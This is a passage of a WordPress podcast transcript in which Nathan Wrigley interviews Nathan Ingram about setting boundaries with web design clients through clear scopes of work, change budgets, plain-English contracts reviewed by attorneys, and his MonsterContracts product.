They had leased that really awesome domain name.</p>\n\n\n\n<p>And it was where I learned WordPress. At that point I was sort of in a, the Macromedia ecosystem, and I had resisted WordPress for quite a while. Decided this is coming and I&#8217;ve got to go with the flow and move into WordPress, because a lot of my clients were looking for WordPress sites. Or sites they could log in and edit themselves. I found iThemes as a theme company, and the training went hand in hand, and that&#8217;s where I learned WordPress. And gradually over time, I started presenting one or two webinars and then gradually rolled into the presenter role.</p>\n\n\n\n<p>[00:06:08] Nathan Wrigley: That&#8217;s nice. And so you do that regularly, three times a week. You go live and give trainings about a whole range of different subjects, right?</p>\n\n\n\n<p>[00:06:15] Nathan Ingram: Yeah, like just yesterday we did our monthly news roundup on iThemes training. So look at the news in the WordPress world. Particularly from the perspective of people who build and manage websites. That&#8217;s really our audience on iThemes training. What news is important for people who do what I do.</p>\n\n\n\n<p>[00:06:29] Nathan Wrigley: Okay, so that&#8217;s really excellent. Unfortunately, it&#8217;s not the topic that we&#8217;re going to be talking about today. We&#8217;re talking about one of the areas, I think in web design that really can cause the blue touch paper to be lit, and the firework to go off. This is the whole thing of relationships with clients and the boundaries that you set, and whether you should have contracts, and whether you should be getting involved with lawyers and things like that.</p>\n\n\n\n<p>And there are very few parts of the business that I used to run, which would cause me to become upset, irritable, and in some cases quite angry. But relationships with clients could do that. It&#8217;s quite unique, isn&#8217;t it?.</p>\n\n\n\n<p>[00:07:15] Nathan Ingram: Oh, it really is, and I&#8217;ll tell you, it is certainly one of the common challenges that people who do WordPress things run into. You go to WordCamps, back when we used to have those things, so we actually just had our WordCamp Birmingham two weeks ago, and it was wonderful to see people in person. But when you get a group of people who work with clients around, you know, a table eating lunch at an event like a WordCamp, inevitably the conversation turns to bad clients and everybody has a story.</p>\n\n\n\n<p>[00:07:40] Nathan Wrigley: Yeah, it&#8217;s just one of those things. I&#8217;ve got a whole litany of stories. On the whole I think I was able to manage this scenario fairly well, but there was a lot of things probably that I shouldn&#8217;t have done. So I gave way in many cases because I believed that the things that the client was asking for didn&#8217;t really push the boundaries too far, although they certainly stepped over the expectations that I had.</p>\n\n\n\n<p>But your premise really, the reason why you&#8217;ve been getting into this and talking about this is because you want to prepare people and educate people to give them a kind of legal framework. And you describe it in terms of boxing in a client if you like. That&#8217;s probably too harsh a word.</p>\n\n\n\n<p>You go about it in much more conciliatory language than that. But the point is, you are educating people to get themselves into a position where they&#8217;ve got some piece of paperwork, some contract. Something written down somewhere where you can all go back and say, okay, these are the boundaries, these are the constraints. If we step outside of these, one of us is at fault. So tell us a little bit more about your approach there.</p>\n\n\n\n<p>[00:08:47] Nathan Ingram: That&#8217;s a great question. So years ago I put talk together about dealing with problem clients. And the title of the talk was &#8220;dealing with problem clients, building fences around friendly monsters&#8221;. And it&#8217;s a book, actually now I turned that into a book on Amazon. But, it&#8217;s really positioning the client, every client as what I would call a friendly monster.</p>\n\n\n\n<p>Meaning they&#8217;re friendly, but they still have teeth. The idea is we need to build fences around the clients that we work with, because we never know what kind of person we&#8217;re dealing with. And the fences that I talk about are the systems and processes in our business.</p>\n\n\n\n<p>Four in particular. We need to establish clarity. We need to have good commitments between us and our clients. We need to have communication and documentation. And those four fences can show up in a lot of different ways depending on your particular business and how you work. And there may be additional fences you&#8217;d want to build, but those four at least have to be in place in order to have good ongoing client relationships.</p>\n\n\n\n<p>And a lot of those things show up in a contract. But they start as just part of your regular business system, the way you work, the way you deal with clients. Clarity, commitments, communication, documentation. And that&#8217;s where it all has to start. Like you&#8217;ve got to get your house in order before you can really bring in a good document, like a contract to, make your rules clear.</p>\n\n\n\n<p>[00:10:10] Nathan Wrigley: I think the clarity piece coming first is really intriguing. Because that was always the misstep that I felt I&#8217;d made. In that I was very often in a position where I felt that I had explained myself clearly, and assuming the clients were being honest when they were explaining their frustration with the way things were going.</p>\n\n\n\n<p>I clearly hadn&#8217;t done that. I maybe expressed it in a way which I understood, maybe that was too technical. And later down the road it became obvious that there was a complete disconnect between what I was trying to achieve, and what they, in their head, had got designed. And so yeah, the clarity piece, I think is perfect at the beginning, but also quite difficult to achieve. How do you, how do you advise that? What are some of the strategies that you&#8217;ve got in place around that?</p>\n\n\n\n<p>[00:10:57] Nathan Ingram: Yeah, it really is difficult, and one of the first things I think you have to realize is that agreement on the surface does not equal clarity. So, if there&#8217;s no meeting of the minds, like maybe we use technical jargon, or maybe the client doesn&#8217;t tell you everything at the beginning.</p>\n\n\n\n<p>I can&#8217;t tell you how many projects I&#8217;ve gotten into where the client, we&#8217;ll get three quarters of the way through the project, and they&#8217;re like, oh, well where do my clients log in? Well, wait, we haven&#8217;t talked about this at all. And in those sorts of situations you ask yourself, well, whose fault is that?</p>\n\n\n\n<p>And I would say it&#8217;s probably 50 50. And so one of the great skills that we can develop in in way, but specifically in our way of working with people on the web, is learning the skill of asking great questions. If you learn the skill of asking great questions, and continuing to ask until you reach that point of clarity. That skill can really set you apart from other people that are doing client work.</p>\n\n\n\n<p>Asking a question, asking why, and following up with additional questions until you really get down to the root of what the client expects. If you don&#8217;t do that, then oftentimes you can be saying one thing, the client can be saying another, and you&#8217;re both shaking your head up and down, but nobody is really clear on what we&#8217;re saying. Assumptions are made.</p>\n\n\n\n<p>[00:12:08] Nathan Wrigley: In the work that you do, do you typically do all of that client exploration work prior to beginning the build? And then in a sense, that process is closed off, and you go away and you take six weeks, whatever it takes to complete your initial first offering and then go back to the client? Or do you, do you encourage a more agile approach where you iterate with the client? I mean, I know that they&#8217;re completely different ways of doing things. Curious as to know what your process is.</p>\n\n\n\n<p>[00:12:36] Nathan Ingram: So it really depends on the complexity of the build. We try to get some understanding of that at the very beginning, when we&#8217;re trying to create the scope of work. If it&#8217;s a project we&#8217;ve done before, if it&#8217;s a simple, just a basic identity piece, a brochure site, that&#8217;s fairly simple.</p>\n\n\n\n<p>When you get into something that is a lot more complicated, maybe there&#8217;s lots of different content types, or you&#8217;ve got to do some really interesting thing with data. A lot of times what we&#8217;ll end up doing, and I picked this up from my friend Beth Livingston, a change budget. So adding a change budget into the original pricing, that as we go forward and the client gets more ideas where things are uncovered, that we didn&#8217;t realize, there&#8217;s some pre-approved money sitting there, that the client can say, okay, we&#8217;ll allocate some of that change budget to build this thing that we hadn&#8217;t talked about yet.</p>\n\n\n\n<p>[00:13:22] Nathan Wrigley: Yeah, we&#8217;re in such a curious industry as well, in that there&#8217;s not many things that I purchase that morph over time. You know, if I go into a shop and I buy some clothes, I&#8217;m just getting what I&#8217;m getting. I can see it right off the bat, and there it is, and I can hold it in my hands, and it&#8217;s either what I want or it&#8217;s not what I want.</p>\n\n\n\n<p>I&#8217;m not going to purchase that pair of trousers and then turned around a week later and said, actually, you know what? These pockets. I&#8217;ve been wearing these trousers for a couple of weeks now, and the pockets are not deep enough. Can we have an amendment to the pockets please? This curious idea of scope creep that creeps into more or less every project that I was ever involved in.</p>\n\n\n\n<p>Are you getting your clients, after your initial discussions then, are you getting them to a point where you draw up some contract which in effect puts the four fences around the friendly monster that you were describing?</p>\n\n\n\n<p>[00:14:12] Nathan Ingram: In our world we would call that the scope of work, which is part of the proposal. That comes from the original conversation. Or if it&#8217;s a complicated project, maybe there&#8217;s a discovery phase that happens first to really flesh out, what is the scope of work? What are we trying to accomplish in this project.</p>\n\n\n\n<p>And then depending on the complexity of the project, the longer, or the more complex a project is, the greater chance of scope creep. Or honestly, the longer a project takes, because the client delays on content or something else. The longer a project takes also, you tend to have scope creep.</p>\n\n\n\n<p>When you talk about scope creep, people&#8217;s eyes roll. They hate scope creep. But I&#8217;ll tell you what, I love scope creep as long as there&#8217;s corresponding price creep, right? If you want more things, that&#8217;s great. It&#8217;s just we can&#8217;t do more for the same price. In your analogy about, we don&#8217;t use the word trousers.</p>\n\n\n\n<p>[00:15:00] Nathan Wrigley: Oh yeah, you use pants don&#8217;t you? I apologize.</p>\n\n\n\n<p>[00:15:02] Nathan Ingram: Yeah. When you&#8217;re talking about something like that, it&#8217;s a little bit different because, well some people sell websites more as a product rather than a custom service. We&#8217;re more on the custom build side. Everything we do is bespoke. But you know, if you&#8217;re selling websites as a service, that is a good analogy because you&#8217;re in package three and this is what it comes with and this is your pair of pants.</p>\n\n\n\n<p>But for us it would be more like, I&#8217;m hiring a contractor to come in and do a remodel on a kitchen .And this is kind of what we talk about at the beginning, but as we go, maybe we had a problem we didn&#8217;t anticipate. Or maybe my wife sees something on television that she wants to add. And so we want to add to it and we change it along the way. That&#8217;s really a closer analogy, I would think, to a custom website.</p>\n\n\n\n<p>[00:15:44] Nathan Wrigley: It&#8217;s pretty clear that the audience for this podcast is pretty broad and deep. In other words, there are all sorts of people listening to this doing all sorts of work around the WordPress space. Some of them very new to WordPress and website building at all. Some of them just doing it for their own hobbies. Other people just getting into building websites for the first time.</p>\n\n\n\n<p>So let&#8217;s speak to that crowd first. The crowd who really are just embarking on a career. They&#8217;re scoping out whether they wish to build websites for other people and charge for that, and make a business out of that. Let&#8217;s speak to the importance of a contract, because it may be that when you&#8217;re starting out, you&#8217;re just doing this with friends and we know that that can turn south quite quickly.</p>\n\n\n\n<p>So, and also, you know, you may be encouraging businesses in your local area to come on board and they&#8217;re going to be expecting something like a contract. Is this an essential component of the makeup of a web designer? Do you truly need a contract? Or is there any realistic situation where it&#8217;s okay to begin work on a website, charging a fee without some legal protection?</p>\n\n\n\n<p>[00:16:50] Nathan Ingram: Wow, what a great question. For years I worked without a contract. I just had a proposal with a scope of work and a price, and you pay me, I build the thing and there it goes. Then I started running into problems. Expectations that were never really talked about anywhere. For example, oh wait, this would&#8217;ve been like many years ago.</p>\n\n\n\n<p>But at that point it was maybe Internet Explorer 6 was the browser of choice for everyone. And the person would say, wait this is not working on my Internet Explorer 4. Well, we don&#8217;t design for older browsers, we design for newer browsers. And there was great difference in rendering between those two.</p>\n\n\n\n<p>These are the sorts of things that you don&#8217;t think about until you have a problem with a client. What I like to say is you don&#8217;t need a contract for good clients. You need a contract for bad clients. But my goodness, it&#8217;s hard to tell them apart at the beginning. So every client gets a contract. And my contract is mostly plain English, and virtually every paragraph in that contract, aside from the necessary legal constructions, everything in that contract is there because I had a problem one time with a client. That now gets added to the contract for the next time.</p>\n\n\n\n<p>[00:17:59] Nathan Wrigley: I was very much like you in that I began way back, and it was long before IE6 in fact. I remember writing that into my contracts at one point. We are not supporting IE6. It was exactly the problem you described. I had happily breezed through multiple websites. No problem at all, everything was fine. I had a client who simply was able to push harder than anybody I&#8217;d come across before. In other words everything that I delivered, they would either reject or request it to be entirely different.</p>\n\n\n\n<p>So this whole notion to me of scope creep and the client who refused to accept that anything was finished, came along. And it really was at that point that I started to look around and try to protect myself. So, I would imagine that your advice is really, it doesn&#8217;t matter on what level you&#8217;re doing this. You need some kind of legal protection, right?</p>\n\n\n\n<p>[00:18:51] Nathan Ingram: So I would even take a step backwards. You need a consistent process that you use for every client, every project, every time. And that process needs to be documented somewhere in something that you and the client agree to. Call it whatever you want. Call it a contract. Call it, as we do, a master services agreement. You could put it in your proposal, but just have some place where everybody&#8217;s agreeing to the process. That&#8217;s that piece of clarity at the beginning where we are clear on how this is going to proceed.</p>\n\n\n\n<p>Where we get into trouble is where we, we think, well we just sort of do every project differently and there&#8217;s not really a consistent process. And so the client is able at that point to dictate how the project goes. Will have at some point, you know, some level of control over your world, as long as you&#8217;re building that website. Instead of realizing, okay, this is the best way to build. We&#8217;re going to document this process out, and have the client agree to it in a contract.</p>\n\n\n\n<p>[00:19:47] Nathan Wrigley: I guess whenever I&#8217;ve read legal contracts before, whether they&#8217;re for my car insurance or what have you. I&#8217;m always confounded by the language used, within moments of beginning the reading of it. I&#8217;m coming across, not only words which I haven&#8217;t encountered before, but the sentence construction is entirely bizarre.</p>\n\n\n\n<p>In other words, it can be read by a lawyer. Sometimes I&#8217;m confused as to whether or not it&#8217;s written deliberately to be hard read or whether or not it&#8217;s the most expedient way of hammering something down perfectly. I can never parse that. Either way, I&#8217;m left confounded.</p>\n\n\n\n<p>So given that lawyers very often end up with this language, which is impenetrable. And you mentioned that your contracts are in plain English. Is it possible to nail things down, absolutely watertight with plain English? And do you feel yourself equipped to do that? Or is this really the domain of a lawyer? Do we need to get a lawyer to go through your contract and inspect it to make sure that in every scenario it&#8217;s having your back?</p>\n\n\n\n<p>[00:20:59] Nathan Ingram: So, just first of all, I&#8217;ll answer this from my perspective as a person who&#8217;s been working with clients, doing web things for over 25 years. I&#8217;m not an attorney. This is not legal advice or anything like that. But my experience has been sort of a blend of both.</p>\n\n\n\n<p>It&#8217;s important to have good, practical experience working with clients and knowing what the problems are. But you also do need the legal language. Because if the worst thing happens and you end up in court with a client, there&#8217;s a reason that attorneys write things the way they do. You know, this is language that has been proven out and so forth.</p>\n\n\n\n<p>And so if you take a contract that is exclusively plain English, you can get tied up with defining what the meanings of this word and that word and so forth are, and it turns into a mess. So, if you went out today and you did a search for a web design contract on the web, you would find two types of contracts in general.</p>\n\n\n\n<p>You would find some that are just absolutely plain English with no legal constructions whatsoever. And those are okay. They do establish clarity, or give you kind of a template to establish some clarity. But they don&#8217;t have the legal protections. On the other side, it&#8217;s like the total opposite end of the spectrum. Contracts that are a hundred percent legalese, and I don&#8217;t understand what some of these things mean. And this is what you were talking about a bit earlier. And I&#8217;m not sure if that really gives clarity to the client, because nobody really knows what any of this means unless you&#8217;re an attorney.</p>\n\n\n\n<p>And so what I found to be the best approach, and this is what I&#8217;ve done, is I began years ago explaining our process. Explaining what we do, what we don&#8217;t do. Explaining some of the issues like browser compatibility, and what happens if you hire a digital marketing person that comes in and they break your website. Are we responsible for that because we&#8217;re managing your website.</p>\n\n\n\n<p>All of the bad experiences I&#8217;ve had with clients, I started putting those things down in a document and then I gave that to an attorney and said, okay, make this legal. And so they added all the necessary legal constructions, and patched the holes. Over time this has become my agency contract, and that&#8217;s what I ultimately turned into MonsterContracts.</p>\n\n\n\n<p>[00:23:02] Nathan Wrigley: With your contracts, did you find that the nature of the project at hand, in other words, the one that you&#8217;re working on right now. Given that each client website is slightly different and it may have different constraints. It may need, I don&#8217;t know, let&#8217;s imagine, a WooCommerce store or something like that. We really are getting into a completely different variety of website. Or it may be a simple brochure site. Or it may be that there&#8217;s a bespoke plugin, for example, has to be written for that website.</p>\n\n\n\n<p>Do you advise taking those contracts that you&#8217;ve had written, or rather inspected by lawyers, do you take them back and get them to look, more of a scan through each time and append to it, the bits and pieces that are needed? Or have you settled on a contract which you think is broadly good enough to fit any situation?</p>\n\n\n\n<p>[00:23:50] Nathan Ingram: It&#8217;s a great question. So this exact situation is why I recommend a two document approach. So we have a proposal of services that deals with the scope of work and the price for every individual project. And those are going to be different every time. But then we have a master services agreement, or a contract, that has the rules of the road for every project. These don&#8217;t change. And so we present those documents together.</p>\n\n\n\n<p>So the contract that the master services agreement covers the process. All these things that we do and timeframes, and what happens if you don&#8217;t pay and, here&#8217;s how the website management works, and we don&#8217;t guarantee results for SEO.</p>\n\n\n\n<p>All these things that need to be in a contract that don&#8217;t change from project to project, are there in the contract. But then the scope of work of we&#8217;re going to build this plugin, or we&#8217;re going to add a store, we&#8217;re going to do whatever. Those are in the proposal, which is the scope of work and the price for that individual project.</p>\n\n\n\n<p>[00:24:43] Nathan Wrigley: Right, okay, that&#8217;s an intriguing separation. Yeah, so two different documents. One which is more bespoke and one which is more generic and you can reuse over and over again.</p>\n\n\n\n<p>[00:24:53] Nathan Ingram: Exactly.</p>\n\n\n\n<p>[00:24:54] Nathan Wrigley: So, given that we&#8217;ve got a contract. Given that it&#8217;s been written by a lawyer, and there may be aspects in there that are impenetrable to us. I guess there&#8217;s always going to be a need to go back to the lawyers. I can imagine the fees of this starting to tick up quite quickly actually. Because if a client comes back to you and you believe they&#8217;re in breach of the contract in some way, but the contract is difficult to read, it&#8217;s in that legal language. That&#8217;s an important thing to do, isn&#8217;t it? You really do have to understand the ins and outs of your contract.</p>\n\n\n\n<p>So given any scenario of inverted commas, wrongdoing by the client, you are able to say to them with confidence, look, this is what you signed. This is what this clause in the contract meant. In other words, you have to know what it says in plain English in your head. Otherwise you can&#8217;t really enforce it, because you wouldn&#8217;t be sure what you were able to enforce.</p>\n\n\n\n<p>[00:25:47] Nathan Ingram: Right, and this is why if you were to open my agency contract, or if you were to look at MonsterContracts. You would see things like payment terms, and they&#8217;re all in plain English. Again, this is why I said earlier, I want to have my system documented ahead of time.</p>\n\n\n\n<p>Like I want to know, internally, this is how we deal with late payments. This is what happens if the client disappears during a project, all these things. We have our policies internally for this. Those are then put into the contract in very plain wording that can be easily pointed to. There have to be legal constructions, but these are, they&#8217;re really at the end of the document and they don&#8217;t pertain, nearly as much to these practical issues that come up with the client.</p>\n\n\n\n<p>[00:26:28] Nathan Wrigley: Do you ever, so this is a question more directed at you personally, given that you&#8217;ve got all these contracts and you&#8217;ve thought all of this through. Do you ever let things slip, in other words, you&#8217;re having a conflict internally. Part of you saying, I know that this client is now in breach of what the, not only the spirit, but the letter of the contract said. But I&#8217;ve got a bit of a spidey sense that I can let this one go. It feels like it&#8217;s going to be all right. Because there be monsters down there.</p>\n\n\n\n<p>And it&#8217;s so easy. I did that and probably continue to do that quite a bit, because sometimes I feel that if I push the legal button, I really have transformed everything. I&#8217;ve suddenly gone from it being a fairly friendly relationship, albeit fraught at times. To a really adversarial relationship where the lawyers are getting involved and so on. So I&#8217;m just wondering whether or you permit yourself to ignore your contracts in some scenarios.</p>\n\n\n\n<p>[00:27:24] Nathan Ingram: Oh, what a great question. So the answer to that question, it revolves around emotional intelligence, right? you have to make a judgment call on, is this a situation that is worth really enforcing the contract or not. And honestly, many times, let&#8217;s just say, here&#8217;s the situation. The client, we&#8217;ve been waiting for three months for the client to supply assets that are needed to build the website, and that happens all the time, right? Clients delay, delay, delay for content, and photography and everything.</p>\n\n\n\n<p>So, in the contract, it says if we haven&#8217;t heard from you in 30 days, then your project is suspended. And there&#8217;s some things that happen as a result of that. Now, can we choose to change that? Sure, but oftentimes what will solve that problem is a simple email to the client. Hey, we haven&#8217;t heard from you in the last 30 days. At this point your project is about to go into suspended status. And this is what that means.</p>\n\n\n\n<p>We explain in the contract. And just having a clarifying email like that can oftentimes shake up the client and get them refocused on the project. If it doesn&#8217;t, then you have to make a judgment call on, is this a salvageable project or not?</p>\n\n\n\n<p>[00:28:34] Nathan Wrigley: Yeah, I feel like I&#8217;ve encountered many different interpretations of this. On the one hand, there&#8217;s a lot of people out there in the wild who really are proponents of, look, the minute it goes wrong, start lawyering. Just protect yourself. Get the lawyers involved. You cease communication with the client and start to go through the lawyers.</p>\n\n\n\n<p>It&#8217;s this idea of, it&#8217;s not working out. I need you to do what you&#8217;ve agreed right now, otherwise it doesn&#8217;t work. We also hear constantly about firing clients and the joy that that can bring.</p>\n\n\n\n<p>But on the other hand, I feel that, like you said, you have to judge off your own instincts sometimes whether there is a legitimate reason behind there. And that has happened to me. You know, I&#8217;ve had clients that have not delivered things, and then it turns out there&#8217;s not only a plausible reason, but a reason, which if it were me in their shoes, I would desperately want the web designer to understand my crisis.</p>\n\n\n\n<p>Something personal has happened, some event in their life has meant that they literally have been away from the computer for weeks on end. And so it&#8217;s not really their fault. I guess the answer is use your judgment. Invoke the spidey sense, and figure out which is the best way to proceed.</p>\n\n\n\n<p>[00:29:42] Nathan Ingram: For sure. I mean, we&#8217;re dealing with people here, right? And so my default dealing with people is generally grace. I&#8217;m very gracious with people. Understanding about issues that come up. On the other hand, it&#8217;s important to have a document that protects you. If you get to the point where you have to fire the client.</p>\n\n\n\n<p>That&#8217;s a great conversation. And, and you hear a lot, especially on social media and Facebook groups and places like that. Oh, we got to fire the client. This whole discussion, right? But that&#8217;s complicated. If you want to fire the client, can you even do that? Do you have a contract that specifies what happens if you want to terminate the relationship?</p>\n\n\n\n<p>That&#8217;s where having a good document that protects you is critical, because you know at some point, oh, the client didn&#8217;t pay me, so I&#8217;m going to turn their website off. Well, guess what? If you just turn their website off for non payment, and they haven&#8217;t agreed to that stipulation, then you can get sued for that.</p>\n\n\n\n<p>Well you didn&#8217;t give me due process and whatever. And you can find yourself in a lot of trouble if you don&#8217;t have a good document that protects you. So my advice is always have a great contract that is weighted towards you as the service provider, and then you can choose to be gracious when you want.</p>\n\n\n\n<p>[00:30:44] Nathan Wrigley: So let&#8217;s get into that bit. You were mentioning about switching the website off. So it&#8217;s almost like the sanctions piece. What do you have in your arsenal as a web designer, which you can bring to bear should you need to apply a little bit of pressure to make sure that things are moving? So I&#8217;m describing a scenario now where things have clearly gone south.</p>\n\n\n\n<p>We&#8217;re definitely in the territory of miscommunication has been heaped upon miscommunication. We&#8217;re at the point of almost falling out. Communication is breaking down, and so we now need to bring out the big guns, if you like. What have we got? You mentioned turning off the website, that&#8217;s obviously one thing that we could do, given that that was in a contract.</p>\n\n\n\n<p>I&#8217;m thinking we could refuse to do any additional work. There&#8217;s obviously the refusal to communicate unless you go through lawyers at this point. What are the kind of things that you would put in your contracts that you would allow yourself to have as an option?</p>\n\n\n\n<p>[00:31:40] Nathan Ingram: So it would obviously depend on where we are in the process of the project. But if you&#8217;re in the middle of building the site, the client is texting you at 2:00 AM, or whatever. This is clearly not going to work, and we&#8217;ve tried to communicate and tried to request the client to change their behaviour, and they just simply won&#8217;t do it for whatever reason, and you need to pull the plug on the project. Then, you know at that point, at least my contract says, we as an agency get to evaluate the work that&#8217;s been done and say, okay, 78% has been completed and so you owe this much more.</p>\n\n\n\n<p>Or if we&#8217;ve already received full payment, we&#8217;ll refund that much or whatever. You need some process by which you can mitigate or decide who gets what at the end of this. So if you&#8217;re in the middle of the project, and you want to pull the plug, somebody has to figure that out.</p>\n\n\n\n<p>If it&#8217;s a client that&#8217;s maybe in a management phase and they&#8217;re just not paying their bill or they&#8217;re asking for too much or whatever, it&#8217;s always a conversation. What&#8217;s going on here? And is there something we don&#8217;t understand about this? But, at some point you have to have an agreement that if you don&#8217;t pay your bill within certain time, then we do suspend the website from view.</p>\n\n\n\n<p>[00:32:46] Nathan Wrigley: I guess there is also a point where you have to cease communication through anything other than the lawyers. Because at some point any stream of email going left, right, and center has to be mediated by a professional who&#8217;s removed from all of this.</p>\n\n\n\n<p>[00:33:03] Nathan Ingram: Yeah, you really do. And you know, we first tried to do arbitration, just to try to keep things out of court. That&#8217;s just a personal preference. But at some point you have to do that. Now, thankfully I&#8217;ve never even gotten close to anything like that, and I&#8217;ve heard horror stories of where it&#8217;s gotten to that point.</p>\n\n\n\n<p>You know, a lot of this is, as you work with clients and you have good client experiences and bad client experiences. You start to develop, like you said earlier, this spidey sense. This radar of early on, like before you even sign a proposal with a client, getting better at filtering out the bad clients at the beginning.</p>\n\n\n\n<p>Hopefully over time that becomes part of this, where you don&#8217;t have nearly the issues. Early on I had bad clients. They would take advantage of me. they didn&#8217;t want to pay. They wanted to pay a just a little bit, not really what the work was worth.</p>\n\n\n\n<p>They would constantly second guess and question my professional decisions. It was just terrible. I began to realize there are better clients out there and, not let those difficult clients in our world to begin with.</p>\n\n\n\n<p>[00:34:02] Nathan Wrigley: It&#8217;s interesting as this podcast has gone on, we&#8217;ve concentrated on the negative aspect of contracts, in the, you know, we&#8217;re protecting ourselves. This horrible thing could happen, so make sure you&#8217;ve got some protection. Oh, and this horrible thing could happen. But really, it&#8217;s the opposite, isn&#8217;t it? The contract is there to give you peace of mind. It&#8217;s to create a sort of positive scenario.</p>\n\n\n\n<p>And so hopefully you won&#8217;t find yourself in these positions. If the contract is robust enough, everybody signed it, read it, understood it, then those boundaries are in place so that these disasters don&#8217;t occur. So there&#8217;s a bit of silver lining on this cloud.</p>\n\n\n\n<p>[00:34:38] Nathan Ingram: Oh, it absolutely is. There&#8217;s this old story about this mother who&#8217;d warned her children about playing next to the road because they lived next to this busy highway. And oh, don&#8217;t get close to the road because, you know, you could get hit by a car or whatever. And so the kids would not go just a few feet from the house because they were terrified of this road.</p>\n\n\n\n<p>And then they realized, well, our kids aren&#8217;t even playing in our yard. So they put up a fence between the yard and the road. And the kids then could play within the boundaries of the fence and weren&#8217;t afraid of the road anymore. And that&#8217;s just a little example of put up a fence, a contract, and it really frees you to work better with clients.</p>\n\n\n\n<p>And in my experience, it&#8217;s if a client out of the gate, if the client pushes back against some of the things in our contract, it&#8217;s a huge red flag that we probably don&#8217;t want to work with this client, just right away. Because everything that is in our contract is there for a reason.</p>\n\n\n\n<p>I tell the clients that. It&#8217;s a rather long document, but everything is there for a purpose. And if you have questions about it, I&#8217;m happy to answer those, you know, happy to talk through why we do this. But it&#8217;s there for a reason and it really establishes the boundaries of our relationship.</p>\n\n\n\n<p>And the remarkable thing about all of this is, people look at a contract, well, I&#8217;m afraid to get my clients to sign this, it&#8217;s really long or whatever. The good clients have no problem signing contracts like this. They welcome it. It&#8217;s a mark of your professionalism that you&#8217;ve thought through your business well enough to have a well crafted document that governs this whole process of us working together.</p>\n\n\n\n<p>[00:36:03] Nathan Wrigley: You&#8217;ve obviously given this a great deal of thought in the past. You live in the United States and you mentioned Alabama. Obviously America&#8217;s a tapestry of different states with laws and, honestly I don&#8217;t understand that a little bit. But in the UK we have UK law and then there&#8217;s EU law, and then obviously there&#8217;s law in other jurisdictions.</p>\n\n\n\n<p>This, I suppose is something which we might mention right now, towards the end of our recording. You&#8217;ve got to have that in mind as well. It really does matter where you are and where the clients are because I guess you&#8217;ve got to think about the law. Should it go wrong, are you protected correctly given where the client is and where you are?</p>\n\n\n\n<p>[00:36:40] Nathan Ingram: Yeah, for sure. There&#8217;s a lot of local laws that govern things that you wouldn&#8217;t think about. And that&#8217;s why it&#8217;s critical to have a local attorney that understands technology and things like intellectual property and these sorts of things, to take a look at whatever document you have.</p>\n\n\n\n<p>One of the biggest challenges with MonsterContracts was, okay, I&#8217;ve got this document that I have a hundred percent faith in for my work here, and really even state to state. There are very few things that would have to change from state to state, using in the United States.</p>\n\n\n\n<p>But then we started getting some people buying the product internationally. And I began to wonder, wow, how is this going to work? I did have some experience. I had a coaching client, somebody that I was working with in business development who lived there in the UK. I provided her a copy of the contract and she had it vetted through a local attorney there.</p>\n\n\n\n<p>There were just very few changes. So, the way that at least my contract works is most of it, and I would just, pulling a number out of the air, say 80% of the document is just plain language about processes and things like that. And the legal language is at the end. So the attorney in the area, whether it&#8217;s internationally or locally in a different state or whatever, they could just substitute the little bits of standard legal language at the end and make it work wherever you are. And we now have people who&#8217;ve bought MonsterContracts all over the world and they&#8217;re having that experience where the attorney can review it with maybe one or two hours of time. It works great for their location.</p>\n\n\n\n<p>[00:38:05] Nathan Wrigley: So just give us the quick elevator pitch of MonsterContracts. It sounds like that it&#8217;s a service that you can essentially log in, pay your subs, and then you can extract from it contracts, which hopefully you can then use.</p>\n\n\n\n<p>[00:38:19] Nathan Ingram: That&#8217;s basically it. And so again, this is, it&#8217;s based on my contract that over 25 years of working with clients, I&#8217;ve gradually made better until it&#8217;s virtually bulletproof, I think, in my opinion. The MonsterContracts is simply a Word document. You log in, you purchase the document. You take this. You tweak anything that&#8217;s there to match your processes or the, you know, if you don&#8217;t do things in the same order that the contract specifies, change that around. Plain simple wording. And then the recommendation is always take that to your local attorney to allow them to, you know, run through it and make any changes.</p>\n\n\n\n<p>And universally the response has been, one or two hours of time and it&#8217;s done. So, for most people they&#8217;re going to have one of the two types. So if they&#8217;re using a contract, they have the type that&#8217;s just plain English and full of holes, or it&#8217;s just a bunch of legalese that no one understands.</p>\n\n\n\n<p>MonsterContracts it addresses the specific situations that we encounter as web professionals, and it provides the cover that you need to grow your business. It addresses all the things that we deal with in client work.</p>\n\n\n\n<p>[00:39:16] Nathan Wrigley: I think you&#8217;ve got a system whereby you can submit amendments that you&#8217;ve had made. So let&#8217;s say for example, in my case, the UK. I could make amendments and then submit them back to MonsterContracts so that other people can benefit from that as well.</p>\n\n\n\n<p>[00:39:32] Nathan Ingram: Yeah, exactly. So we have the ability to do that. That&#8217;s an area of MonsterContracts that I&#8217;m really working on growing this year. We haven&#8217;t had as many members do that as I had hoped originally. And so that&#8217;s one of our goals this year is to expand those revisions. MonsterContracts is a subscription, just to keep access because we do have the contract vetted by an attorney annually.</p>\n\n\n\n<p>And, there are usually at least a few changes to the contract every year to just keep up to date with things that are happening in client work. The subscription gives you access to those changes as well as any revisions that people upload. And if you upload a revision that&#8217;s accepted we credit you for that year&#8217;s cost.</p>\n\n\n\n<p>[00:40:06] Nathan Wrigley: So a scary subject hopefully somewhat tamed by having contracts. Nathan, thanks for chatting to us today and putting our minds at rest and giving us some advice. If the listeners to this would like to get in touch or figure out where you are or begin a chat with you, what are the best, some of the best places to find you online?</p>\n\n\n\n<p>[00:40:26] Nathan Ingram: Yeah, sure. So, monstercontracts.com is, the place to find the MonsterContracts product. There&#8217;s a great contact form there if you want to reach out to me about any contract related questions. My coaching website is nathaningram.com. That is available out there for coaching work or questions around that subject. And I&#8217;m online three days a week with iThemes training, at training.ithemes.com.</p>\n\n\n\n<p>[00:40:48] Nathan Wrigley: Nathan Ingram, thank you so much for chatting to us on the podcast today. I really appreciate it.</p>\n\n\n\n<p>[00:40:52] Nathan Ingram: Thanks, Nathan. I enjoyed it.</p>\n</div>\n\n\n\n<p>On the podcast today, we have <a href=\"https://nathaningram.com/\">Nathan Ingram</a>.</p>\n\n\n\n<p>Nathan is the host at iThemes Training where he teaches WordPress and business development topics via live webinar. Based in Birmingham, Alabama, he has been working with clients to build websites since 1995.</p>\n\n\n\n<p>He’s also the creator of MonsterContracts, which helps WordPress professionals create contracts for their client work.</p>\n\n\n\n<p>If you’ve worked directly with clients, then you’ll know that things don’t always go according to plan. Assets might not be delivered on time. The client does not respond to your emails. The expectations of the client begins to creep away from the original proposal.</p>\n\n\n\n<p>Whilst there’s unlikely to be a perfect system to ensure that all projects run according to the plan, you can protect yourself from some of the worst aspects, and for this, you may need a contract.</p>\n\n\n\n<p>Nathan is on the podcast today to talk about why he 